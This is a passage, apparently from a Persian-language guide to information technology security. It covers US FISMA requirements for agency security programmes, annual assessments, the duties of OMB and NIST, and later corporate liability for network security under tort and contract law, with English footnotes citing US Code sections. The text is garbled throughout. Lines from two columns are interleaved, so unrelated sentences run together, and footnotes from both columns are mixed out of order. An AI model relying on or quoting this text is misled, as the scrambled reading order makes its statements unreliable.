ﭘﻮﻳﺎﻳﻲ ﺑﺮﺍﻱ ﺩﻭﻟـﺖ ﻓـﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﻧﺪ ﻭ ﺍﻧﺘﺨـﺎﺏ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺍﺗﺨﺎﺫ ﻛﺮﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫـﺎ ﺧﻮﺍﺳـﺘﻪ
ﺍﻣﻨﻴﺘﻲ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺗﺎ ﻓﻮﺭﻳﻪ ۲۰۰۳ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺗﺨﺼﺼﻲ ﻭﺍﮔﺬﺍﺭ ﻣﻲﮔﺮﺩﺩ. ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﻭ ﮔﺎﻣﻬـﺎﻱ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ
FISMAﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺭﺋﻴﺲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺩﺍﺭﻧـﺪ .ﺩﺭ ﻣـﺎﺭﺱ ۲۰۰۱ﺷـﻮﺭﺍﻱ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺣﻴﻄﺔ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺗﻬﻴـﻪ ،ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ ﻭ ﻭﺯﺍﺭﺗــﻲ ﮔــﺴﺘﺮﺵ ﺭﺍﻫﺒــﺮﻱ ﻣﻜــﺎﻧﻴﺰﻩ ﻋﻤــﻮﻣﻲ ٥٧ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ
ﺍﺟﺮﺍ ﻛﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻛﺎﺭﻫﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﺗﻮﺳﻂ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﺪﻳﺮﻳﺖ ﻣـﻲﺷـﻮﺩ ﺭﺍ ﺩﺭ ﺑـﺮ ﺑﮕﻴـﺮﺩ ٦٣.ﺍﻳـﻦ ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ ٥٨.ﺩﺭ ﺳﺎﻝ ۲۰۰۲ﺯﻣﺎﻧﻴﻜﻪ ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ
ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ: ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﺑﺨﺶ ﺍﺟﺮﺍﻳـﻲ ﺩﻭﻟـﺖ ،ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺭﺗﻘﺎ ﻧﺪﺍﺩﻩ ﺍﺳﺖ،
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﻣﻴﺰﺍﻥ ﺁﺳـﻴﺒﻲ ﻛـﻪ ﻣﻤﻜـﻦ •
٦٤
ﻣﺼﻮﺑﺔ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻭﻟـﺖ ) ٥٩(FISMAﺭﺍ ﺍﺑـﻼﻍ
ﺍﺳﺖ ﺑﻪ ﺩﻻﻳﻠـﻲ ﭼـﻮﻥ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ )ﺍﺳـﺘﻔﺎﺩﻩ،
ﻛﺮﺩ ﺗﺎ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ ﺭﺍ ﺭﻭﺷـﻦ
60 Federal Information Security Management 55 Meeting of G8 Ministers of Justice & Home
Act, Title III of E-Government Act of 2002, Affairs, Paris, May 5, 2003,
Pub. Law 107-347, http://www.g8.utoronto.ca/justice/justice03050
http://csrc.nist.gov/policies/FISMA-final.pdf 5.htm
61 Auditing 56 Risk Management
ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﻗﺒﻠﻲ ﻣﺮﺍﺟﻌﻪ ﺷﻮﺩ ،ﻭ ﻧﻴﺰ: ۶۲ 57 Ministerial Council for Promoting the
http://www.fedcirc.gov/library/legislations/FIS Digitization of Public Administration
MA.html 58 http://www.kantei.go.jp/foreign/it/
63 Title 44, United States Code, section 3544 network/priority-all/7.html
64 Unauthorized Access 59 Federal Information Security Management Act
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٤٢
ﻋﻤﻠﻜﺮﺩﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻃﺮﺣﻬـﺎ ﻭ ﮔﺰﺍﺭﺷـﺎﺕ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺍﻓﺸﺎﺳﺎﺯﻱ ،ﺍﺧﺘﻼﻝ ،ﺗﻐﻴﻴﺮ ،ﻳﺎ ﭘﺎﻙ ﻛﺮﺩﻥ( ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﻭﺍﻗـﻊ
ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ؛ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﺑﻮﺩﺟـﺔ ﺷﻮﺩ؛
ﺳﺎﻟﻴﺎﻧﺔ ﺳﺎﺯﻣﺎﻥ ،ﻣﺪﻳﺮﻳﺖ ﻣﺎﻟﻲ ،ﺣﺴﺎﺑﺮﺳﻲ ﺩﺍﺧﻠﻲ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ: •
ﺭﺍﻫﺒـﺮﻱ ﻫــﺴﺘﻨﺪ .ﭼﻨﺎﻧﭽــﻪ ﺩﺭ ﺳﻴﺎﺳــﺘﻬﺎ ،ﺭﻭﺍﻟﻬــﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎ oﺑﺮ ﺍﺳﺎﺱ ﻓﺮﺁﻳﻨﺪ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ؛
ﻫﺮﮔﻮﻧﻪ ﺍﺷﻜﺎﻟﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺑﻪ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ oﻣﻨﺠﺮ ﺑﻪ ﻛﺎﻫﺶ ﻫﺰﻳﻨﻪﻫـﺎﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ
ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻭ ﻛﻨﮕﺮﻩ ﮔﺰﺍﺭﺵ ﮔﺮﺩﺩ. ﻣﻲﺷﻮﻧﺪ؛
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻫﻤـﻪﺳـﺎﻟﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﻣﻨﻴﺘـﻲ ﻣـﺴﺘﻘﻠﻲ ﺭﺍ ﺑـﺮﺍﻱ oﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﭼﺮﺧـﺔ
ﻣﺸﺨﺺ ﻛﺮﺩﻥ ﺗﺄﺛﻴﺮ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ ﻋﻤﻠﻜﺮﺩﻫـﺎﻱ ﺣﻴﺎﺕ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑـﺼﻮﺭﺕ
ﺧﻮﺩ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ .ﻫـﺮ ﺍﺭﺯﻳـﺎﺑﻲ ﺩﻭ ﻗـﺴﻤﺖ ﺩﺍﺭﺩ :ﻗـﺴﻤﺖ ﺍﻭﻝ ﻛﺎﻣﻞ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؛ ﻭ
ﺑﺮﺭﺳــﻲ ﺗــﺄﺛﻴﺮ ﺳﻴﺎﺳــﺘﻬﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺍﻣﻨﻴــﺖ oﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛـﻪ ﺍﻟﺰﺍﻣـﺎﺕ ﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
٦٥
ﺍﻃﻼﻋﺎﺗﻲ ﻳﻚ ﺯﻳـﺮﺑﺨﺶ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺳـﺎﺯﻣﺎﻥ؛ ﻭ ﺍﻣﻨﻴﺘﻲ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪ ﺭﻳـﺰﻱ )،OMB
ﻗﺴﻤﺖ ﺩﻭﻡ ﻳﻚ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ،ﺭﻭﺍﻟﻬـﺎ ،ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺑﺨﺸﻲ ﺍﺯ ﺩﻓﺘﺮ ﺍﺟﺮﺍﻳﻲ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ( ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﺷﻮﺩ؛
٦٦
ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺗﺒﻂ. ﺗﻬﻴــﺔ ﻃﺮﺣﻬــﺎﻱ ﻓﺮﻋــﻲ ﺑــﺮﺍﻱ ﻓــﺮﺍﻫﻢ ﻛــﺮﺩﻥ ﺍﻣﻨﻴــﺖ •
FISMAﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﺢ ﻛﺎﻓﻲ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪﻫـﺎ ،ﺍﻣﻜﺎﻧـﺎﺕ ،ﻭ
ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻧﻤﺎﻳﻨﺪﺓ ﺍﺩﺍﺭﺓ ﻣﺪﻳﺮﻳﺖ ﻭ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ؛
ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﺗﻬﻴـﻪ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻫﻤـﺔ ﺑﺮﮔﺰﺍﺭﻱ ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ •
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺳﺮﭘﺮﺳـﺘﻲ ﻛﻨـﺪ. ﻛﺎﺭﻛﻨـــﺎﻥ ﺳـــﺎﺯﻣﺎﻥ ،ﭘﻴﻤﺎﻧﻜـــﺎﺭﺍﻥ ﻭ ﺳـــﺎﻳﺮ ﻛـــﺎﺭﺑﺮﺍﻥ
FIMSAﻫﻤﭽﻨــﻴﻦ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﺭﺍﻫﺒﺮﺩﻫــﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؛
ﭘﻴﺸﻨﻴﺎﺯﻫﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ٦٧،ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻻﺯﻡ ﺭﺍ ﺑـﻪ
ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﻋﻠـﻮﻡ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭﺍﮔـﺬﺍﺭ ﻛـﺮﺩﻩ ﻭ ﻧﻤﺎﻳﻨـﺪﺓ ﺍﺩﺍﺭﺓ ﺁﺯﻣﻮﺩﻥ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ •
ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷـﺪﻥ ﺍﻳـﻦ ﺍﻃﻼﻋــﺎﺕ ،ﺭﻭﺍﻟﻬــﺎ ﻭ ﺗﺠﺮﺑﻴــﺎﺕ ،ﻛــﻪ ﺷــﺎﻣﻞ ﺁﺯﻣــﻮﺩﻥ
ﻧﻴﺎﺯﻫﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﺪ ﻭ ﺣﺪﺍﻗﻞ ﺳﺎﻟﻲ ﻳﻜﺒﺎﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ،ﻋﻤﻠﻜﺮﺩﻱ ﻭ ﻓﻨﻲ ﻣﻲﺑﺎﺷﺪ؛
ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻥ ﺭﺍ ﻣــﺮﻭﺭ ﻭ ﺍﺻــﻼﺡ ﻧﻤﺎﻳــﺪ .ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺮﺍﻱ ﻃﺮﺍﺣﻲ ،ﺍﺟﺮﺍ ،ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ •
ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻣﺴﺌﻮﻝ ﺍﺭﺍﺋﻪ ﮔﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻋﻤﻠﻴﺎﺕ ﻧـﺎﮔﺰﻳﺮﻱ ﺑـﺮﺍﻱ ﺟﺒـﺮﺍﻥ ﻧﻘـﺎﺋﺺ ﺩﺭ ﺳﻴﺎﺳـﺘﻬﺎ،
٦٨
ﺑﺎﺯﺩﻩ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻛﻨﮕﺮﻩ ﻣﻲﺑﺎﺷﺪ. ﺭﻭﺍﻟﻬﺎ ،ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ؛
ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ،ﮔـﺰﺍﺭﺵ ﻭ ﭘﺎﺳـﺦ ﺑـﻪ ﻭﻗـﺎﻳﻊ •
ﺍﻣﻨﻴﺘﻲ؛ ﻭ
ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻃﻤﻴﻨــﺎﻥ ﺍﺯ ﺗــﺪﺍﻭﻡ ﻓﻌﺎﻟﻴــﺖ •
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ.
ﺩﺭ ﺧــﺼﻮﺹ ﻛﻔﺎﻳــﺖ ﻭ ﺍﺛﺮﺑﺨــﺸﻲ ﺳﻴﺎﺳــﺘﻬﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ
ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻴﺰﺍﻥ ﺗﻄﺎﺑﻖ ﺁﻧﻬﺎ ﺑﺎ
ﻋﻨﺎﺻﺮ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ،ﻫﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ
ﺑــﻪ ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ ﻣــﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟــﻪﺭﻳــﺰﻱ ﻭ ﻛﻤﻴﺘــﻪﻫــﺎﻱ
ﻛﻨﮕﺮﻩﺍﻱ ،ﻳﻚ ﮔـﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳـﺪ .ﺑﻌـﻼﻭﻩ ﻣﻴـﺰﺍﻥ
ﻛﻔﺎﻳﺖ ﻭ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ،ﺭﻭﻧـﺪﻫﺎ ﻭ
66 Title 44, United States Code, section 3545
67 Title 40, United States Code, section 11331
68 Title 44, United States Code, section 3543 65 Office of Management and Budget
٢٤٣ ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻧﻘﺾ ﺗﻌﻬﺪﺍﺕ ﺭﻭﺑﺮﻭ ﺷﻮﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ ﺑﺮﺍﻧﮕﻴﺨﺖ .ﻛﻨﮕﺮﻩ ﺗﺼﻮﻳﺐ ﻛﺮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ
ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺛﺎﻟـﺚ ﺑﻜـﺎﺭ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺷﺮﻛﺘﻬﺎ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﻛﻨﮕﺮﻩ ﻫﻤﭽﻨﻴﻦ
ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺭﺯﻳﺎﺑﻲ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻧﻴـﺰ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻧﺠﺎﻡ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﻛﺖ ﻣﻴـﺎﻧﻲ ﺍﻟﺰﺍﻣﻲ ﺩﺍﻧﺴﺖ .ﻫﻤﭽﻨﻴﻦ ﻃﺒﻖ ﻗﺎﻧﻮﻥ ﻋﺎﻡ ﺷﺮﻛﺘﻬﺎ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﺷﻮﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﺣﻤﻠﻪ ﺍﻱ ﺗﻮﺳﻂ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﺠﺎﺭﻱ ﻋﻤـﻮﻣﻲ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻏﻴﺮﻭﺍﺑـﺴﺘﻪ ﺗﺤـﺖ
ﺷﺮﻛﺖ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ ﻗﺮﺑﺎﻧﻴﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎ ﺍﺛﺒـﺎﺕ ﺍﻳـﻦ ﺣﺴﺎﺑﺮﺳﻲ ﻣﺎﻟﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ .ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﻣﺘﻮﺟـﻪ
ﻣﻮﺿﻮﻉ ﺷﺮﻛﺖ ﺭﺍ ﻣﺘﻬﻢ ﺑﻪ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻦ ﺿﻮﺍﺑﻂ ﻭ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺷﻮﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﻨﺎﺩ ﻣﺎﻟﻲ ﺷﺮﻛﺖ ﺭﺍ ﺗﻬﺪﻳﺪ
ﻻﺯﻡ ﺍﺳﺘﺨﺪﺍﻣﻲ ﻳﺎ ﻧﻈﺎﺭﺗﻲ ﻧﻤﺎﻳﻨﺪ. ﻣﻲﻛﻨﻨـﺪ ،ﺷﺎﺧـﺼﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﻧﻴـﺰ ﺑـﻪ ﺣﻴﻄـﺔ
ﺣﺴﺎﺑﺮﺳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻣﻲﺳﺎﺯﻧﺪ .ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ،
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺣﺘﻲ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫـﻢ -ﻛـﻪ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺣـﺴﺎﺑﺮﺳﺎﻥ ﺍﻳﺠـﺎﺩ
ﻣﻮﺍﺭﺩ ،ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻏﻴﺮﻋﻤـﺪﻱ ﻣﻮﺟـﻮﺩ ﻫـﺴﺘﻨﺪ -ﺍﻳـﻦ ﻧـﻮﻉ
ﻛﺮﺩﻩﺍﻧﺪ.
ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ ﺗﻬﻴﻪ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻣﻨﻴﺖ
ﺷﺒﻜﻪ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﻧﻨﻤﻮﺩﻩ ﺍﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ
ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭﺩﺍﺩ
ﺷــﺎﻳﺪ ﺗﻨﻬــﺎ ﮔﺬﺷــﺖ ﺯﻣــﺎﻥ ﺑﺘﻮﺍﻧــﺪ ﺗﺌﻮﺭﻳﻬــﺎﻱ ﻗــﺪﻳﻤﻲ
ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻨـﺪ .ﺩﺭ ﻃﺒــﻖ ﻗــﺎﻧﻮﻥ ﻗــﺮﺍﺭﺩﺍﺩ ،ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ ﺩﺳﺘﺮﺳــﻲ
ﺁﻥ ﺯﻣﺎﻥ ﺩﺍﺩﮔﺎﻫﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻳﺎ ﺁﺳﻴﺐ ﻧﺎﺷﻲ ﺍﺯ ﻧﻘـﺎﺋﺺ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ
